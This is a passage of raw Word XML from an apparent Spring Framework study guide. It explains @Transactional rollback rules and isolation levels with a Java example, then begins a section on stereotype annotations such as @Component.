    <w:p w14:paraId="121846B8" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 xml:space="preserve">@Transactional allows you to specify which exceptions should trigger a rollback and which should not. By default, only </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unchecked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (subclasses of RuntimeException) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., OutOfMemoryError) trigger a rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485DB30C" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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You can specify rollback behavior explicitly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAAA1A9" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:ind w:left="1440"/>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Transactional(rollbackFor = Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2608A31E" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:ind w:left="1440"/>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public void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34667DC1" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:ind w:left="1440"/>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 xml:space="preserve">    // This will cause rollback for both checked and unchecked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3365E" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:ind w:left="1440"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79AB82" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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You can also specify that certain exceptions should not trigger a rollback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B581A1" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:ind w:left="1440"/>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Transactional(noRollbackFor = SQLException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033ACA72" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:ind w:left="1440"/>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public void someMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01751970" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:ind w:left="1440"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    // SQLException will not trigger a rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D7CA4" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:ind w:left="1440"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1183445D" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Isolation Levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2719D" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 xml:space="preserve">@Transactional also supports specifying different </w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>isolation levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to control the visibility of changes made by one transaction to other concurrent transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D9185" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>READ_UNCOMMITTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows reading uncommitted changes from other transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C34868A" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>READ_COMMITTED</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows reading committed data, preventing dirty reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A3333" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REPEATABLE_READ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that data read by one transaction is not modified by others until the transaction is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B07EB" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1857"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SERIALIZABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures complete isolation, preventing other transactions from reading or modifying data being read or written by the current transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDB746D" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of @Transactional Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0E39F5" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D26D55" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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public class UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B91D24" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9F9797" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">    @Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31874776" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">    private UserRepository userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD37E9" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E6A868" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">    @Transactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7718E" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">    public void createUserAndTransactionExample() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572C0AE8" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">        User user1 = new User("John", "Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB5A92" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">        userRepository.save(user1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE6947" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D9CB9E" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">        // Simulate some error that should cause a rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08654BF0" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">        if (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311EDA01" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">            throw new RuntimeException("Simulated error");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E2B76" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F61233" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5025218B" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">        User user2 = new User("Jane", "Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84A45E" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">        userRepository.save(user2);  // This will not be executed due to the rollback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA27FF0" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77131990" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:p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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C8A16C" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1858"/>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In the above example, both user1 and user2 would be inserted into the database if no error occurs. However, due to the simulated exception, the transaction will be rolled back, and the changes made to the database will not persist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E58CAB" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Benefits of @Transactional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62524D31" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1859"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Simplifies Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No need to manually start, commit, or rollback transactions. Spring handles it automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A683F2C" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1859"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consistency and Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures the integrity of the data by managing transaction boundaries, especially when dealing with complex database operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C43D0" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1859"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Declarative Approach</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows you to manage transactions declaratively, making the code more maintainable and clean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D271AE" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1859"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can configure rollback behavior, propagation levels, and isolation levels to suit different requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4860085C" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D9DD8" w14:textId="77777777" w:rsidR="00720C1D" w:rsidRPr="00A05E02" w:rsidRDefault="00720C1D" w:rsidP="00A05E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A05E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The @Transactional annotation in Spring is used for declarative transaction management. It simplifies handling transactions by managing the transaction lifecycle automatically (begin, commit, rollback), ensuring data consistency and atomicity, and allows you to define transaction behavior such as propagation, isolation, and rollback rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B4B79C" w14:textId="3FC7D10C" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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96E83ED">
          <v:rect id="_x0000_i2106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D7CD84" w14:textId="373F499A" w:rsidR="00926509" w:rsidRPr="00CE4B95" w:rsidRDefault="00926509">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="437" w:name="_Toc196307917"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are different stereotypes annotations in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="437"/>
    </w:p>
    <w:p w14:paraId="6A92D5DA" w14:textId="7E1579E2" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Spring, </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stereotype annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a set of annotations that are used to define Spring beans or components. They help Spring to recognize and manage the different components or layers of an application. These annotations are part of Spring's </w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism and are used to mark classes that will be automatically registered as Spring beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E230223"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lastRenderedPageBreak/>
        <w:t>The key stereotype annotations in Spring are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4015A872" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C67DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. @Component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EBEBF1" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1860"/>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The @Component annotation is a generic stereotype used to define a Spring bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC73DD1" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1860"/>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It indicates that a class is a Spring component and can be auto-detected by Spring’s classpath scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189B366C" w14:textId="77777777" w:rsidR="00DB1944" w:rsidRPr="000C67DA" w:rsidRDefault="00DB1944" w:rsidP="000C67DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1860"/>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It is the most general-purpose annotation and can be used to define any Spring-managed bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15838941"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67DA">
